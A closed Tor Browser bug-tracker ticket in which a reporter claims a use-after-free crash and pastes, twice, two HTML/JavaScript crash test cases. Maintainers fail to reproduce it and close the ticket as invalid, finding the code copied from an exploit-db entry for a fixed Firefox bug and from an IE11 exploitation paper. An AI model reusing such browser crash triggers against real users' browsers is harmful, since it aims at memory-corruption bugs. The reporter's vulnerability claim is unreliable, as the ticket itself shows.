Opened 4 months ago

Closed 4 months ago

Last modified 4 months ago

#26705 closed project (invalid)

BUG Report ! Use after Free Vulnerability

Reported by: t4rkd3vilz Owned by: tbb-team
Priority: Very High Milestone:
Component: Applications/Tor Browser Version:
Severity: Normal Keywords:
Cc: Actual Points:
Parent ID: Points:
Reviewer: Sponsor:

Description

hello,

tor browser click new tab.

a new tab open html in code :

<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>

and open second tab.

Second tab in code:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

a result: Tor browser CRASHH...

Impact
hello,

tor browser click new tab.

a new tab open html in code :

<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>

and open second tab.

Second tab in code:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

a result: Tor browser CRASHH...

Child Tickets

Attachments (3)

tor2.png (73.3 KB) - added by t4rkd3vilz 4 months ago.
crash senary
tor1.png (62.8 KB) - added by t4rkd3vilz 4 months ago.
crash tor 3.png (22.0 KB) - added by t4rkd3vilz 4 months ago.
result

Download all attachments as: .zip

Change History (7)

comment:1 Changed 4 months ago by Dbryrtfbcbhgf

Component: Core Tor/TorApplications/Tor Browser
Owner: set to tbb-team
Version: Tor: unspecified

comment:2 Changed 4 months ago by boklm

Status: newneeds_information

I tried this in Tor Browser 7.5.6, and 8.0a9, but this did not crash for me.

Changed 4 months ago by t4rkd3vilz

Attachment: tor2.png added

crash senary

Changed 4 months ago by t4rkd3vilz

Attachment: tor1.png added

Changed 4 months ago by t4rkd3vilz

Attachment: crash tor 3.png added

result

comment:3 Changed 4 months ago by boklm

Some questions:

  • on which OS are you seeing this issue? So far we have tried loading the 2 html pages in 2 tabs on Linux, Windows 7 and macOS 10.11 without being able to reproduce the issue.
  • In the screenshots, you seem to be loading the pages locally (with file:/// URLs). Does this issue only happen with local pages, or can you reproduce it when loading them with http?
  • In tor2.png it looks like you open the second page using the file manager. Can you reproduce the issue by copy pasting the address in the URL bar instead of using the file manager to open it? The error in crash tor 3.png looks like an error you would get if you try to run more than one instance of the browser. So the issue might be how the file manager has been configured to open new pages in Tor Browser.

comment:4 Changed 4 months ago by gk

Resolution: invalid
Status: needs_informationclosed

So, it seems both examples are more or less copy-and-pasted: the first example code from https://www.exploit-db.com/exploits/41660/ aka https://bugzilla.mozilla.org/show_bug.cgi?id=1340138 and the second one from http://www.signalsec.com/publications/UseAfterFree-Exploiting.pdf. The former got fixed a while ago and the latter seemed to affect IE 11, which is why neither crashes Tor Browser. Thus, closing as invalid.

Last edited 4 months ago by gk (previous) (diff)
Note: See TracTickets for help on using tickets.